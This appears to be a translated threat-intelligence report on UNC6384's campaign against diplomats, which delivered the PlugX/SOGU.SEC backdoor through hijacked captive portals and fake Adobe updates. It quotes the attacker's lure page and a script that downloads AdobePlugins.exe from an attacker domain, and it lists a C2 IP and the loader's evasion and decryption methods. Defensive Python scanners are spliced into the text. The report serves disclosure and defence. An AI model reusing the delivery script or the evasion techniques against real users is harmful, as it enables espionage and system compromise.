Chinese cyberspies continue to refine their attack methods, using fake updates and intercepting Internet traffic. According to Google Threat Intelligence Group, the PRC-nexus group has targeted diplomats in Southeast Asia and beyond. The attackers used a sophisticated infection chain: fake “update” pages, a digitally signed STATICPLUGIN downloader, a hidden CANONSTAGER module, and a malicious SOGU.SEC (PlugX) backdoor. This approach allowed them to evade antivirus detection and maintain a presence on victims’ systems.
In March 2025, the Google Threat Intelligence Group (GTIG) uncovered a sophisticated, multi-faceted campaign attributed to the PRC-linked cyberespionage actor UNC6384. The campaign targeted diplomats in Southeast Asia and other organizations around the world. GTIG assesses that it was likely designed to support cyberespionage operations that served the strategic interests of the People’s Republic of China (PRC).
The campaign hijacks targeted web traffic using captive portal redirects to deliver a digitally signed downloader that GTIG tracks as STATICPLUGIN. This ultimately resulted in the deployment of the SOGU.SEC backdoor (also known as PlugX) in memory. This multi-stage attack chain uses advanced social engineering, including valid code signing certificates, adversary-in-the-middle (AitM) attacks, and indirect execution techniques to evade detection.
Google is proactively protecting its users and customers from this threat. We have sent a government-backed threat actor notification to all Gmail and Workspace users affected by this campaign. We encourage users to enable enhanced Safe Browsing for Chrome, ensure all devices are fully updated, and enable two-step verification on their accounts. In addition, all detected domains, URLs, and file hashes have been added to the Google Safe Browsing list of dangerous web resources. Google Security Operations (SecOps) has also been updated with relevant data, allowing defenders to detect this activity in their environment.
This blog post presents our findings and analysis of this espionage campaign, as well as the evolution of the attacker’s operational capabilities. We examine how the malware is delivered, how the attacker used social engineering and evasion techniques, and the technical aspects of the multi-stage malware deployment.
In this campaign, the malware payloads were disguised as software updates or plugins and delivered via the UNC6384 infrastructure using AitM and social engineering tactics. An overview of the attack chain:
The target device’s web browser checks whether the Internet connection sits behind a captive portal;
AitM redirects the browser to a website controlled by the attacker;
The first stage malware, STATICPLUGIN, is downloaded;
STATICPLUGIN then retrieves the MSI package from the same website;
Finally, CANONSTAGER is loaded with a DLL and deploys the SOGU.SEC backdoor.

GTIG has found evidence of a captive portal being used to deliver malware disguised as an Adobe plugin update to targets. A captive portal is a network configuration that redirects users to a specific web page, typically a login or splash page, before granting access to the Internet. Detecting such a portal is functionality deliberately built into all web browsers. The Chrome browser makes an HTTP request to a hardcoded URL (“http://www.gstatic.com/generate_204”) to trigger this redirect mechanism.
While “gstatic.com” is a legitimate domain, our investigation found redirect chains from this domain leading to the attacker’s landing page and subsequent malware delivery, indicating an AitM attack. We assess that the AitM was carried out via compromised edge devices on the targeted networks. However, GTIG did not observe the attack vector used to compromise those edge devices.
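A defender can watch the same probe the page describes: a genuine answer to generate_204 is an empty 204, so any redirect or substituted page is worth logging. The following is an added example, not GTIG tooling; the allowlist entry and the redirect hostname in the constructed responses are placeholders.

```python
"""Classify the answer to Chrome's captive-portal probe so a redirected probe
is logged rather than silently followed (added example, not GTIG tooling)."""
import urllib.request
from urllib.error import HTTPError, URLError
from urllib.parse import urlparse

PROBE_URL = "http://www.gstatic.com/generate_204"   # probe URL cited on the page
# Portals your own network legitimately uses; anything else is escalated.
KNOWN_PORTALS = {"portal.corp.example"}             # placeholder allowlist

def classify_probe(status, headers, body):
    """Verdict for one probe response: 'clean', 'known-portal',
    'unexpected-redirect:<host>' or 'unexpected-content'."""
    hdrs = {k.lower(): v for k, v in headers.items()}
    if status == 204 and not body:
        return "clean"                          # what gstatic really answers
    if 300 <= status < 400:
        host = (urlparse(hdrs.get("location", "")).hostname or "").lower()
        if host in KNOWN_PORTALS:
            return "known-portal"
        return f"unexpected-redirect:{host or '?'}"
    return "unexpected-content"   # e.g. a 200 page injected in place of the 204

class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface 3xx answers instead of following them."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None

def probe_live(url=PROBE_URL, timeout=5):
    """Send the probe without following redirects and classify the answer."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(url, timeout=timeout) as resp:
            return classify_probe(resp.status, dict(resp.headers), resp.read())
    except HTTPError as err:                      # 3xx/4xx/5xx land here
        return classify_probe(err.code, dict(err.headers), err.read())
    except URLError as err:
        return f"error:{err.reason}"

# Constructed responses: a genuine answer and an AitM-style redirect to a
# look-alike "update" site (the hostname is a placeholder, not the real one).
GENUINE = (204, {"Content-Length": "0"}, b"")
HIJACKED = (302, {"Location": "https://updates.example/AdobePlugins.html"}, b"")

if __name__ == "__main__":
    for name, resp in (("genuine", GENUINE), ("hijacked", HIJACKED)):
        print(name, "->", classify_probe(*resp))
    print("live ->", probe_live())
```

Run it periodically from endpoints or a network sensor and alert on any verdict other than clean or known-portal.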

Once redirected, the attacker attempts to trick the target into believing that a software update is needed and into downloading malware disguised as a “plugin update.” The attacker used several social engineering techniques to create a coherent and credible update theme.
The landing page resembles a legitimate software update site and uses an HTTPS connection with a valid TLS certificate issued by Let’s Encrypt. Using HTTPS offers several advantages for social engineering and malware delivery. Browser warnings such as “Not Secure” and “Your Connection is Not Private” are not displayed to the target, and the connection to the website is encrypted, making it difficult for network security tools to inspect and detect the malicious traffic. Additionally, the malware payload is disguised as legitimate software and is digitally signed with a certificate issued by a certification authority.
$ openssl x509 -in mediareleaseupdates.pem -noout -text -fingerprint -sha256
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            05:23:ee:fd:9f:a8:7d:10:b1:91:dc:34:dd:ee:1b:41:49:bd
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=US, O=Let's Encrypt, CN=R10
        Validity
            Not Before: May 17 16:58:11 2025 GMT
            Not After : Aug 15 16:58:10 2025 GMT
        Subject: CN=mediareleaseupdates[.]com
sha256 Fingerprint=6D:47:32:12:D0:CB:7A:B3:3A:73:88:07:74:5B:6C:F1:51:A2:B5:C3:31:65:67:74:DF:59:E1:A4:E2:23:04:68
Website TLS certificate
The initial landing page is completely blank with a yellow bar at the top and a button that says “Install Missing Plugins…” If this method successfully fools the target into believing they need to install additional software, they may be more willing to manually bypass host-based Windows security protections to execute the delivered malicious payload.

In the background, JavaScript code is loaded from a script file named “style3.js” hosted on the same domain as the HTML page. When the target clicks the install button, the function “myFunction” defined in the loaded script is executed.
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Additional plugins are required to display all the media on this page</title>
<script type="text/javascript" src="https//mediareleaseupdates[.]com/style3.js"> </script>
</head>
<body><div id="adobe update" onclick="myFunction()"...
JavaScript from AdobePlugins.html
Inside “myFunction”, another image is loaded and displayed as the background image of the web page. The browser window location is also set to the URL of the executable, again hosted on the same domain.
function myFunction()
{
var img = new Image();
img.src ="data:image/png;base64,iVBORw0KGgo[cut]
...
document.body.innerHTML = '';
document.body.style.backgroundImage = 'url(' + img.src + ')';
...
window.location.href = "https//mediareleaseupdates[.]com/AdobePlugins.exe";
}
JavaScript from style3.js
This triggers the automatic download of “AdobePlugins.exe” and a new background image that will be displayed on the web page. The image shows instructions for executing the downloaded binary and bypassing potential Windows protections.

When the downloaded executable is launched, a fake installation prompt is displayed on the screen, as seen in the screenshot above for “STEP 2,” along with the options “Install” and “Cancel.” However, the SOGU.SEC payload is likely already running on the target device, as none of the buttons trigger any malware-related actions.
Once delivered to the target Windows system, the malware initiates a multi-stage deployment chain. Each stage involves tactics aimed at bypassing host defenses and maintaining stealth on the affected system. The chain culminates in a new side-loaded DLL, tracked as CANONSTAGER, deploying the SOGU.SEC backdoor in memory, which then establishes communication with the attacker’s command and control (C2) server.
The downloaded file “AdobePlugins.exe” is a first-stage malware loader. The file was signed by Chengdu Nuoxin Times Technology Co., Ltd. with a valid certificate issued by GlobalSign. The primary advantage of signed malware is that it can bypass endpoint protections that trust files carrying valid digital signatures. This lends the malware a false sense of legitimacy, making it harder for both users and automated defenses to detect.
The binary was code-signed on May 9, 2025, which may indicate how long this version of the loader has been in use. Although the signing certificate expired on July 14, 2025 and is no longer valid, it could be easy for an attacker to re-sign new versions of STATICPLUGIN using similarly obtained certificates.

STATICPLUGIN implements its own TForm that masquerades as a legitimate Microsoft Visual C++ 2013 Redistributables installer. The malware uses the Windows Installer COM object to download another file from “https//mediareleaseupdates[.]com/20250509[.]bmp”. However, the “BMP” file is actually an MSI package containing three files. Once these files are installed, CANONSTAGER is executed via DLL side-loading.
File name     Description                       SHA-256
cnmpaui.exe   Canon IJ Printer Assistant Tool   4ed76fa68ef9e1a7705a849d47b3d9dcdf969e332bd5bcb68138579c288a16d3
cnmpaui.dll   CANONSTAGER                       e787f64af048b9cb8a153a0759555785c8fd3ee1e8efbca312a29f2acb1e4011
cnmplog.dat   RC4-encrypted SOGU.SEC            cc4db3d8049043fa62326d0b3341960f9a0cf9b54c2fbbdffdbd8761d99add79
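
The table above gives both a hash list and a file-name triad a hunter can sweep for. The following is an added example, not a GTIG tool: it walks a directory tree, flags exact SHA-256 matches on the three values from the table, and separately flags the three names sitting together in one directory; the demo directory it builds holds constructed stand-in files, so only the co-location signal fires there.

```python
"""Hunt a directory tree for the CANONSTAGER drop set listed in the table
above (added example, not a GTIG tool)."""
import hashlib
import os
import tempfile
from pathlib import Path

IOC_SHA256 = {  # values copied from the table on the page
    "cnmpaui.exe": "4ed76fa68ef9e1a7705a849d47b3d9dcdf969e332bd5bcb68138579c288a16d3",
    "cnmpaui.dll": "e787f64af048b9cb8a153a0759555785c8fd3ee1e8efbca312a29f2acb1e4011",
    "cnmplog.dat": "cc4db3d8049043fa62326d0b3341960f9a0cf9b54c2fbbdffdbd8761d99add79",
}
DROP_SET = frozenset(IOC_SHA256)

def sha256_file(path: Path) -> str:
    """Stream the file so large binaries do not have to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()

def scan_tree(root) -> list:
    """Return findings as (directory, kind, detail) tuples. kind is
    'hash-match' (exact IoC hit) or 'co-located' (all three names in one
    directory). The .exe is a legitimate Canon tool, so a hit on it alone is
    weak; the DLL, the .dat and their co-location carry the weight."""
    findings = []
    for dirpath, _, files in os.walk(root):
        lower = {f.lower(): f for f in files}          # keep on-disk casing
        present = set(lower) & DROP_SET
        if present == DROP_SET:
            findings.append((dirpath, "co-located", "+".join(sorted(present))))
        for name in sorted(present):
            digest = sha256_file(Path(dirpath) / lower[name])
            if digest == IOC_SHA256[name]:
                findings.append((dirpath, "hash-match", f"{name} {digest}"))
    return findings

def demo_tree() -> str:
    """Build a throwaway directory holding constructed stand-ins for the
    three files (made-up bytes, so only the co-location signal fires)."""
    root = tempfile.mkdtemp(prefix="canonstager_demo_")
    drop = Path(root) / "AppData" / "Roaming" / "demo"    # placeholder path
    drop.mkdir(parents=True)
    for name in DROP_SET:
        (drop / name).write_bytes(b"constructed stand-in for " + name.encode())
    return root

if __name__ == "__main__":
    for finding in scan_tree(demo_tree()):
        print(*finding)
```

Point scan_tree at user profile and temp directories on a suspect host; a hash-match on cnmpaui.dll or cnmplog.dat is a confirmed hit, a co-located finding without hash matches is a rebuilt or re-encrypted variant to triage.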
Our investigation revealed that this is not the first suspicious executable signed by a certificate issued by Chengdu Nuoxin Times Technology Co., Ltd. GTIG currently tracks 25 known malware samples signed by this signer, which are used by multiple PRC-nexus activity clusters. Many examples of these signed binaries are available on VirusTotal.
GTIG previously investigated two additional campaigns using malware signed by this organization. While GTIG does not link these other campaigns to UNC6384, they share numerous similarities and TTP matches with this UNC6384 campaign, in addition to using the same code signing certificates:
Delivery via web redirects
First-stage downloader, sometimes packaged in an archive
In-memory droppers and memory-only backdoor payloads
Masquerading as legitimate programs or updates
Targeting in Southeast Asia
It remains an open question how the attackers obtain these certificates. The subscribing organization could be a victim with compromised code signing material. However, it could also be a willing participant or a front company facilitating cyber espionage operations. Malware samples signed by Chengdu Nuoxin Times Technology Co., Ltd date back to at least January 2023. GTIG continues to monitor the connection between this organization and PRC-nexus cyber operations.
Once CANONSTAGER executes, its ultimate goal is to stealthily execute an encrypted payload, a variant of SOGU tracked as SOGU.SEC. CANONSTAGER implements a control flow obfuscation technique using custom API hashing and thread local storage (TLS). The loader also uses legitimate Windows features, such as window procedures, message queues, and callback functions, to execute the final payload.
Thread Local Storage (TLS) is designed to provide each thread in a multithreaded application with its own private data store. CANONSTAGER uses the TLS array data structure to store function addresses determined using its own API hashing algorithm. The function addresses are later called throughout the binary from offsets in the TLS array.
In short, API hashing hides which Windows APIs are being used, while the TLS array provides a hidden place to store the resolved function addresses. The use of the TLS array for this purpose is unconventional. Storing function addresses here may be overlooked by analysts or security tools that are scrutinizing more common data storage locations.
Below is an example of how CANONSTAGER resolves and stores the GetCurrentDirectoryW function address:
Resolve the GetCurrentDirectoryW address from its hash (0x6501CBE1);
Get the TLS array location from the thread information block (TIB);
Move the resolved function address to offset 0x8 of the TLS array.

CANONSTAGER hides its startup code in a custom window procedure and starts its execution indirectly through the Windows message queue. Using these legitimate Windows features reduces the likelihood that security tools detect the malware and raise alerts. It also obscures the malware’s control flow by “hiding” its code inside the window procedure and starting execution asynchronously.
At a high level, CANONSTAGER:
Registers a class containing a callback function;
Creates a new window with the registered class;
Sends WM_SHOWWINDOW to the message queue;
Enters a message loop to receive and send messages to the created window;
Creates a new thread to decrypt “cnmplog.dat” as SOGU.SEC when the window receives a WM_SHOWWINDOW message; then
Executes SOGU.SEC in memory using the EnumSystemGeoID callback.

In Windows, each window class has an associated window procedure. The procedure allows programmers to define their own function to handle messages sent to the specified window class.
CANONSTAGER creates an Overlapped Window with a registered WNDCLASS structure. The structure contains a callback function to the programmer-defined window procedure to handle the messages. In addition, the window is created with a zero height and width to remain hidden on the screen.
Inside the window procedure, a check is made for the presence of a message of type 0x0018 (WM_SHOWWINDOW). When a message of this type is received, a new thread is created with a function that decrypts and runs the SOGU.SEC payload. For any message type other than 0x0018 (or 0x2 for ExitProcess), the window procedure calls the default handler (DefWindowProc), ignoring the message.
Windows applications use message queues for asynchronous communication. Both user programs and the Windows system can send messages to message queues. When a message is sent to an application window, the system calls the appropriate window procedure to handle the message.
To launch the malicious window procedure, CANONSTAGER uses the ShowWindow function to send a WM_SHOWWINDOW message (0x0018) to its newly created window via the message queue. Since the system or other programs can also send messages to the CANONSTAGER window, the standard Windows message loop is entered. This allows every queued message, including the planted WM_SHOWWINDOW message, to be dispatched:
1. GetMessageW – retrieves the next message from the thread’s message queue.
2. TranslateMessage – translates virtual-key messages into character messages.
3. DispatchMessage – delivers the message to the window procedure (WindowProc) of the window the message is addressed to.
4. Return to step 1 until all messages have been dispatched.
Once the window procedure receives a message of the correct type, CANONSTAGER proceeds to deploy the SOGU.SEC payload by performing the following steps:
Read the encrypted file “cnmplog.dat” contained in the downloaded MSI package;
Decrypt the file using the hardcoded 16-byte RC4 key;
Execute the decrypted payload using the EnumSystemGeoID callback function.
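For an analyst who has pulled the 16-byte key out of CANONSTAGER, the decryption step above is a plain RC4 pass over cnmplog.dat; the only judgement call is knowing whether a candidate key worked. The following is an added helper, not CANONSTAGER's own code: the key and the encrypted blob it builds are constructed placeholders, since the real key and sample bytes are not on the page. It treats an MZ header as a definite hit and a sharp entropy drop as a plausible one, which is what position-independent code handed to a callback would look like.

```python
"""Decrypt an RC4-protected blob such as cnmplog.dat and judge whether a
candidate key worked (added analyst helper; key and sample are constructed)."""
import math
from collections import Counter

def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA); symmetric, so it both builds the demo
    blob and decrypts it."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte; RC4 output sits near the maximum."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def try_key(key: bytes, blob: bytes):
    """Return (verdict, plaintext): 'pe' for an MZ header, 'plausible' when
    entropy dropped sharply (shellcode-like output), 'no' when the output is
    still noise, i.e. the key is wrong."""
    if len(key) != 16:
        raise ValueError("CANONSTAGER's hardcoded key is 16 bytes")
    plain = rc4(key, blob)
    if plain[:2] == b"MZ":
        return "pe", plain
    if entropy(plain) < entropy(blob) - 1.0:
        return "plausible", plain
    return "no", plain

# Constructed stand-in for cnmplog.dat: a fake PE stub encrypted under a
# placeholder key. Neither the key nor the bytes come from the real sample.
PLACEHOLDER_KEY = b"0123456789abcdef"
FAKE_PAYLOAD = b"MZ" + b"\x90" * 62 + b"This program cannot be run in DOS mode.\r\n" * 10
FAKE_CNMPLOG = rc4(PLACEHOLDER_KEY, FAKE_PAYLOAD)

if __name__ == "__main__":
    for key in (PLACEHOLDER_KEY, b"ffffffffffffffff"):
        print(key, "->", try_key(key, FAKE_CNMPLOG)[0])
```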

UNC6384 previously used both payload encryption and callback functions to deploy SOGU.SEC. These techniques are used to hide malicious code, avoid detection, obfuscate control flow, and blend in with normal system activity. Furthermore, all of these steps are performed in memory, avoiding file-based detection on the endpoint.
SOGU.SEC is a distinct variant of SOGU that is commonly used by UNC6384 in cyber espionage activities. It is a sophisticated and heavily obfuscated malware backdoor with a wide range of capabilities. It can collect system information, upload and download files from the C2, and execute a remote command shell. In this campaign, SOGU.SEC was observed to directly contact the C2 IP address “166.88.2[.]90” using HTTPS.
GTIG attributes this campaign to UNC6384, a PRC-linked cyber espionage group, and TEMP.Hex (also known as Mustang Panda). Our attribution is based on similarities in tooling, security partner programs, targeting, and command and control (C2) infrastructure overlaps. UNC6384 and TEMP.Hex have been observed targeting government sectors, primarily in Southeast Asia, in line with PRC strategic interests. Both groups have also been observed distributing the SOGU.SEC malware from malware DLL loaders and using the same C2 infrastructure.
This campaign is a prime example of the continued evolution of UNC6384’s operational capabilities and highlights the sophistication of PRC-nexus-linked attackers. The use of advanced techniques such as AitM, combined with valid code signing and multi-layered social engineering, demonstrates the capabilities of this attacker. This activity is consistent with a broader trend that GTIG has observed where PRC-nexus-related attackers are increasingly using stealthy tactics to evade detection.
GTIG actively monitors ongoing threats from entities such as UNC6384 to protect users and customers. As part of this effort, Google is continuously updating its defenses and has taken specific actions against this campaign.